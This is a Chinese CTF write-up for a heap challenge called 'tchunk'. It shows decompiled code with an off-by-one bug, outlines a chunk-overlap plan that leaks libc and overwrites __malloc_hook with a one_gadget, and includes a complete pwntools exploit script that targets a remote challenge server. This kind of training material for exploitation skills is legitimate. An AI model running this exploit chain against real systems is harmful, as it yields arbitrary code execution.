tchunk(offbyone+堆块重叠)
题目:
int sub_F4B()
{
int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]
v2 = __readfsqword(0x28u);
puts("Please Input index:");
_isoc99_scanf("%d", &v1);
if ( !*((_QWORD *)&unk_202060 + 5 * v1) )
return printf("Error!");
puts("Change EMo Content");
return read(0, *((void **)&unk_202060 + 5 * v1), (unsigned int)(*((_DWORD *)&unk_20206C + 10 * v1) + 1));
}
思路:
利用offbyone构造堆块重叠->申请4个chunk(0,1,2,3)(最后一个用于隔绝topchunk)->free 0 ->编辑1修改2的pre_size为0和1的和,size的最后一位为0->free2->0,1,2合并->申请0->show 1->libc
->申请2(实际是从1分割出去的)->free 2->编辑1的fd就是修改2的fd为malloc-0x23(fackchunk)->把fackchunk申请回来并添加内容使malloc的值=onegadget->调用malloc->shell
script:
from pwn import *
from LibcSearcher import *
def conn():
global r,Libc,elf
#r = process("./tchunk")
Libc = ELF("./libc-2.23.so")
r = remote("1.95.36.136", 2093)
#elf = ELF("./pwn1")
def add(x,y,z):
r.sendlineafter(b"Choice!\n",b"1")
r.sendlineafter(b"item:\n",str(x).encode())
r.sendlineafter(b"Size:\n",str(y).encode())
r.sendlineafter(b"Emo!:\n",z)
def edit(x,y):
r.sendlineafter(b"Choice!\n",b"3")
r.sendlineafter(b"index:\n",str(x).encode())
r.sendlineafter(b"Content\n",y)
def free(x):
r.sendlineafter(b"Choice!\n",b"2")
r.sendlineafter(b"index:\n",str(x).encode())
def show(x):
r.sendlineafter(b"Choice!\n",b"4")
r.sendlineafter(b"index:\n",str(x).encode())
def pwn():
add(0,0xf8,b'0')
add(1,0xf8,b'0')
add(2,0xf8,b'0')
add(3,0x100,b'0')
free(0)
#show(0)
edit(1,b'a'*0xf0+p64(0x100+0x100)+b'\x00')
free(2)
add(0,0xf8,b'0')
show(1)
libc = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x3c4b78
print("libc>>>",hex(libc))
malloc = libc + Libc.sym["__malloc_hook"]
add(2,0x68,b'aaa')
free(2)
edit(1,p64(malloc-0x23))
add(2,0x68,b'a')
one = [0x4527a,0xf03a4,0xf1247]
onegadget = libc+one[2]
print("onegadget>>>",hex(onegadget))
add(4,0x68,b'a'*0x13+p64(onegadget))
r.sendlineafter(b"Choice!\n",b"1")
#gdb.attach(r)
r.interactive()
conn()
pwn()
浙公网安备 33010602011771号